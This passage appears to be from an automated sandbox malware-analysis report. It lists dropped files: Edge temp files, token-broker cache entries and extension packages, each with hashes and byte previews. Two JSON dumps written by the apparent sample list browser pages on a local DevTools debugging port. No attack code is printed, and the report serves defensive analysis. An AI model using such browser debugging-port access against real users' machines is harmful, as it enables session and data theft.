                                                                                                                                                                                                                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".q.6.k./.4.f.9.U.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.p.m.Z.E.J.T.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2684
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.911982759131685
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:uiTrlKx68Wa7x2Jxl9Il8u/FqGzk0ZUbbhqz35sPuZSGhyqKkoWd/vc:aMYpFq84Nqzp/ZwqQ
                                                                                                                                                                                                                                                                                    MD5:69A6BCFE0860ED528118BCED16C7949B
                                                                                                                                                                                                                                                                                    SHA1:566A9ADD5800FA9E7E82B98D56EA24CB125A14D8
                                                                                                                                                                                                                                                                                    SHA-256:B6BEB65484F8C4C597C51FF7390FD865A4509EF88C967231C8EE7B329BF3740F
                                                                                                                                                                                                                                                                                    SHA-512:513CD41B1E49EEE56F9AD226DA699FE43F1417611F9D19614AFB38385325C28DFACF8F9C247065D220D691A96DC666564A235B70A62F198B5008E44F1CDD2D52
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".H.M.h.3.E.d.F.z.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.p.m.Z.E.J.T.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\json[1].json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):3500
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.402448286281946
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:6NnCqHCqNnCUbCXNnCc9CLNnCFdgEC2NnC8C9NnC8vDC8+NnCIOMTwCIJNnCI2jK:6NpNONuN2FNSN7GNLhmJNb
                                                                                                                                                                                                                                                                                    MD5:C4229390E4A221A78CFD07DABCF56794
                                                                                                                                                                                                                                                                                    SHA1:F316C25E45C9883821843918D44883B3A1141DE0
                                                                                                                                                                                                                                                                                    SHA-256:28A27028A223229C736D8BDD21506FFEDF62871E8A2A7161970EBADAA946E9BF
                                                                                                                                                                                                                                                                                    SHA-512:522FF36B9E4502522A2D4285B27574001FC8E6EF44DE6BAD3F844D50D6D288E85DBA5095DEB9C5F9799923ECF626F3511D5A2B10BBB1C82BFAC62FECBC7AE4D7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/4B700256B07BDC9CE1E45981E8D92E8D",.. "id": "4B700256B07BDC9CE1E45981E8D92E8D",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/4B700256B07BDC9CE1E45981E8D92E8D"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/04EEB3F7C10103BDD5433D3D997670FB",.. "id": "04EEB3F7C10103BDD5433D3D997670FB",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/04EEB3F7C10103BDD5433D3D997670FB"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1787
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.374676127771131
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:SfNaoCFTECOfNaoCPV0VFCPVIfNaoCxCNfNaoCT0UrU0U8CN:6NnCFTEC2NnCMCyNnCxC5NnCT0UrU0Ub
                                                                                                                                                                                                                                                                                    MD5:BA106FD279C557FC580F05419B36E942
                                                                                                                                                                                                                                                                                    SHA1:6DBA3B78E4B64A9F388A177236DED360A5125B19
                                                                                                                                                                                                                                                                                    SHA-256:7E6DB349369EBCC83EB3D977574990536141E3002E97FF61CBEC869676F8C824
                                                                                                                                                                                                                                                                                    SHA-512:8EE45F3244E7CD5812E23096FBC775B80B4E11385210F359898FC59AA588E7F739CFA80F83B1F46FD58EDBE7BECB6259316D12CDE0ADDDDA48079987D4CAC6AE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/3E20396B92BCB16156AC61F50E4BD9F6",.. "id": "3E20396B92BCB16156AC61F50E4BD9F6",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/3E20396B92BCB16156AC61F50E4BD9F6"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/D4CFC2FB6A7E4EBD6594F014A53D8274",.. "id": "D4CFC2FB6A7E4EBD6594F014A53D8274",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/D4CFC2FB6A7E4EBD6594F014A53D8274"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\486e75fb-d3f8-41b0-be72-c9b83549e34c.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):154477
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                    MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                    SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                    SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                    SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4ab2088e-509f-4099-8b64-233dcb0297e0.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41900
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):76321
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.996057445951542
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6wpGzxue:GdS8scZNzFrMa4M+lK5/nXexue
                                                                                                                                                                                                                                                                                    MD5:D7A1AC56ED4F4D17DD0524C88892C56D
                                                                                                                                                                                                                                                                                    SHA1:4153CA1A9A4FD0F781ECD5BA9D2A1E68C760ECD4
                                                                                                                                                                                                                                                                                    SHA-256:0A29576C4002D863B0C5AE7A0B36C0BBEB0FB9AFD16B008451D4142C07E1FF2B
                                                                                                                                                                                                                                                                                    SHA-512:31503F2F6831070E887EA104296E17EE755BB6BBFB1EF2A15371534BFA2D3F0CD53862389625CF498754B071885A53E1A7F82A3546275DB1F4588E0E80BF7BEE
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\a1d621f8-8ca0-4ac1-bf76-2d376b6436b7.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):206855
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                                                    MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                                                    SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                                                    SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                                                    SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\a29b2c23-6e08-4d22-b64a-2c35eb79f9b5.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2110
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4112007134435585
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rri:8e2Fa116uCntc5toY5Zb5M
                                                                                                                                                                                                                                                                                    MD5:D0B70EFDE8DC66EA180E8EC44C4AB144
                                                                                                                                                                                                                                                                                    SHA1:234B56CF0388DE19C8D17CA5DA99D04DDC1C9574
                                                                                                                                                                                                                                                                                    SHA-256:2A8A15DFFFCD7407B3089297460073A8D7438284F93C55E267FDCD2A5905C153
                                                                                                                                                                                                                                                                                    SHA-512:13F270DA247D372FE65C6411F5D6BC432D84D9852AB08D1E28EC979BA75B7AC4082BE2A4B2746EA3964D30EA7AF8364B99A99BA58851101B1D7FFBB7AED6323F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\dbebfd16-a185-4ac9-9a78-fa35ec54c0a9.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\e58e90fe-b7c4-4330-af47-4a24cd416b8b.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1539024
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.991225831646159
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:24576:sVFxetPJnORAIBx6LpI9brLetNBIDp1E6q5YhzV1xjM8472skMnD6gzzLYG:szQlIBY6ZfOBIDp1/qG9/4hkMn5B
                                                                                                                                                                                                                                                                                    MD5:05C709C14B33D181E0578BE01E2271F8
                                                                                                                                                                                                                                                                                    SHA1:CBB91AB80CC88BCFB0A0F63F2AF2547A2F27612F
                                                                                                                                                                                                                                                                                    SHA-256:84A55D8DFA4709D9C6C69CC44804831610C1471642D1E4E7C29E03D6960BC794
                                                                                                                                                                                                                                                                                    SHA-512:9FACD0D9A1F638BCB6A1104038FFFA8711597C904810D3D05DB32CCD73E09D8C9037B0888E4C3432A592A0CC709CDB3C89F85668B981F927C5D8F246C79682F5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR...2...2......?......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....eXIfMM.*.............................J...........R.(...........i.........Z.......H.......H.............................2...........2...........pHYs................YiTXtXML:com.adobe.xmp.....<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="XMP Core 6.0.0">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:tiff="http://ns.adobe.com/tiff/1.0/">. <tiff:Orientation>1</tiff:Orientation>. </rdf:Description>. </rdf:RDF>.</x:xmpmeta>..^......IDATh..Z.t\.y.f.fF.b$.....2.%.0`...qR..&.J..4...a+1.p....z ...J....p @h....W..E.b-3...w.<i$.b..........+.S.Ip*....\n...7..#........m.......s....3~..D.nn.,.y.Q..@eA5f.7`F.L.e.#3#.nX.*.D.n...n.U.e.g.\H...>IW.s.s..!.D.r[.K.....-k.r..x...@.(..<O6<n.D..r.TmD.$c.'z..A....../..?@]Y.....2...d....J...+.t=.l.}.!.RH.I..H`..xo..X..)...e.. c..n#..d...p..Bz.*....(.$....4E:.L.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\ea2c8d60-2487-4313-bc32-9e65102e9278.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):11185
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                    MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                    SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                    SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                    SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\scoped_dir8004_1328029345\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1753
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                    MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                    SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                    SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                    SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                    Malicious:false
